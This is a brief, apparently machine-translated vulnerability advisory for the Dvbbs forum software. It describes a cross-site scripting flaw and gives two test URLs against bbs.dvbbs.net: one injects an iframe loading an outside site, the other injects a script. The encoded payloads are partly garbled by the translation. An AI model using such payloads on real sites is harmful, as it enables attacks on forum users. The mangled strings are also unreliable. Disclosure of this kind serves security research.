As the largest community forum software service provider in China, relying on its powerful functions, extraordinary access speed and load capabilities, friendly and convenient user interfaces, high-quality customer services, leading domestic technology and powerful and continuous product R & D innovation capability, the mobile network community forum products provided by the mobile network account for more than 70% of the domestic Community Forum products.
The target website does not effectively filter or convert the variable code submitted by the user, allowing attackers to insert malicious WEB code.
Test code 1:
Asp? BoardID = 8 & ErrCodes = 60 & action = % 22% 3E % 3 Ciframe % 20src = % 22 http://www.51chi.net/qing%22+qing "> http://bbs.dvbbs.net/showerr.asp? BoardID = 8 & ErrCodes = 60 & action = % 22% 3E % 3 Ciframe % 20src = % 22 http://www.51chi.net/qing%22+qing
Test code 2:
Http://bbs.dvbbs.net/index.asp? Boardid = 8 & TopicMode = 0 & List_Type = % 27% 22% 29% 3b % 3E % 3C % 2 hour rame % 3E % 3 CscRiPT % 3 Ealert % 28% 27www.51chi.net/qing%27%29%3C%2fScrIPT%3E
The Provider Program (method) may be aggressive and only available for Security Research and Teaching. You are at your own risk!